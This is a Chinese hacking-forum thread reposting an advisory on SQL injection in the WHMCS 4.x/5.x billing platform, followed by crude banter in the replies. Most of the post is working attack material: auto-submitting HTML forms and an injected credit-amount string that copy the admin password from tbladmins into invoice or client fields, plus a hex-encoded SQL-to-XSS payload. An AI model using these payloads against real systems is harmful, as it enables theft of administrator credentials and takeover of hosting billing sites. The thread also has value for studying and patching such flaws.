查看: 16165|回复: 4

WHMCS 4.x & 5.x – Multiple Web Vulnerabilities

[复制链接]
发表于 2013-12-31 00:53:55 | 显示全部楼层 |阅读模式
# Exploit Title: WHMCS v4.x & v5.x - Multiple Web Vulnerabilities
# Date: 2013-12-10
# Exploit Author: ahwak2000
# Vendor Homepage: http://whmcs.com/
# Version: 4.x , 5.x
# Tested on: win 7

+------------------+
| Vulnerability |
+------------------+
[AppleScript] 纯文本查看 复制代码
File : includes\dbfunctions.php 
  
function db_escape_string($string) {
  
$string = mysql_real_escape_string($string);
  
return $string;
  
}

+------------------+
| Description |
+------------------+

the script use this function to secure the input
the function disable only the ' and "
but we can bypass it if the query don't use '

+------------+
| Example |
+------------+

file : admin/invoices.php
[AppleScript] 纯文本查看 复制代码
[...]
$query = "UPDATE tblinvoices SET credit=credit-" . db_escape_string($removecredit) . " WHERE id='" . db_escape_string($id) . "'";
                full_query($query);
[...]

+------------+
|Exploitation|
+------------+

[AppleScript] 纯文本查看 复制代码
<html>
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
    <input type="hidden" name="token" value="ahwak2000">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="removecredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
    <input type="hidden" name="action" value="edit">
    </form>
    <script type='text/javascript'>document.myForm.submit();</script>
</html>

或者
[AppleScript] 纯文本查看 复制代码
<html>
    <body onload="submitForm()">
    <form name="myForm" id="myForm"
    action="http://localhost/whmcs5214/admin/invoices.php" method="post">
    <input type="hidden" name="token" value="ahwak2000">
    <input type="hidden" name="id" value="1">
    <input type="hidden" name="addcredit" value="-99,invoicenum=(select password from tbladmins limit 0,1)">
    <input type="hidden" name="action" value="edit">
    </form>
    <script type='text/javascript'>document.myForm.submit();</script>
</html>

+------------+
| Example 2|
+------------+

file : includes/invoicefunctions.php
[AppleScript] 纯文本查看 复制代码
function applyCredit($invoiceid, $userid, $amount="", $noemail = "") {
    $query = "UPDATE tblinvoices SET credit=credit+" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($invoiceid) . "'";
    full_query($query);
    $query = "UPDATE tblclients SET credit=credit-" . db_escape_string($amount) . " WHERE id='" . mysql_real_escape_string($userid) . "'";
    full_query($query);
[...]
    }
  
}
  
File: /viewinvoice.php
if ($invoice->getData("status") == "Unpaid" && 0 < $creditbal) {
      
    $creditamount = $whmcs->get_req_var("creditamount");
    if ($whmcs->get_req_var("applycredit") && 0 < $creditamount) {
        check_token();
  
        if ($creditbal < $creditamount) {
            echo $_LANG['invoiceaddcreditovercredit'];
            exit();
        }
        else {
            if ($balance < $creditamount) {
                echo $_LANG['invoiceaddcreditoverbalance'];
                exit();
            }
            else {
              
                applyCredit($invoiceid, $invoice->getData("userid"), $creditamount);
            }
        }
  
        redir("id=" . $invoiceid);
    }
  
    $smartyvalues['manualapplycredit'] = true;
    $smartyvalues['totalcredit'] = formatCurrency($creditbal) . generate_token("form");
  
    if (!$creditamount) {
        $creditamount = ($balance <= $creditbal ? $balance : $creditbal);
    }
  
    $smartyvalues['creditamount'] = $creditamount;
}

+------------+
|Exploitation|
+------------+
Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit

if client have creditt and when he want to pay with credit

in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1)

the admin password will be in the client address

+-----------------+
sql => xss

SQL can convert to XSS
Must Encode XSS to Hex
Example :

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)

?
[AppleScript] 纯文本查看 复制代码
//<script>alert('ahwak2000');</script>

SQL can be modified to work when all members and supervisors
(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~

+-------------------+

./END
游客,如果您要查看本帖隐藏内容请回复
回复

使用道具 举报

发表于 2013-12-31 01:26:28 | 显示全部楼层
本帖最后由 野驴~ 于 2013-12-31 01:27 编辑

楼主,你这么牛逼,你妹子知道么。就是不知道现在最高版本到X了
我必须再回来补一句,楼主你回复可见的内容真实太牛逼了,楼下值得拥有,绝对的干货。快来回复吧!

点评

我家妹子在床上就知道我已经有多牛逼了。嘿嘿  详情 回复 发表于 2013-12-31 11:47
回复 支持 反对

使用道具 举报

发表于 2013-12-31 02:06:20 | 显示全部楼层
这都可以 ~ 妞B吧 你家人都知道吗~
回复 支持 反对

使用道具 举报

 楼主| 发表于 2013-12-31 11:47:27 | 显示全部楼层
野驴~ 发表于 2013-12-31 01:26
楼主,你这么牛逼,你妹子知道么。就是不知道现在最高版本到X了
我必须再回来补一句,楼主你回复可见的内容 ...

我家妹子在床上就知道我已经有多牛逼了。嘿嘿

点评

你为何这么猥琐  详情 回复 发表于 2013-12-31 16:59
90_
你还能再贱一点么  发表于 2013-12-31 11:59
回复 支持 反对

使用道具 举报

发表于 2013-12-31 16:59:22 | 显示全部楼层
C4r1st 发表于 2013-12-31 11:47
我家妹子在床上就知道我已经有多牛逼了。嘿嘿

你为何这么猥琐
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

指导单位

江苏省公安厅

江苏省通信管理局

浙江省台州刑侦支队

DEFCON GROUP 86025

旗下站点

邮箱系统

应急响应中心

红盟安全

联系我们

官方QQ群:112851260

官方邮箱:security#ihonker.org(#改成@)

官方核心成员

Archiver|手机版|小黑屋| ( 沪ICP备2021026908号 )

GMT+8, 2025-5-1 17:55 , Processed in 0.075227 second(s), 23 queries , Gzip On.

Powered by ihonker.com

Copyright © 2015-现在.

  • 返回顶部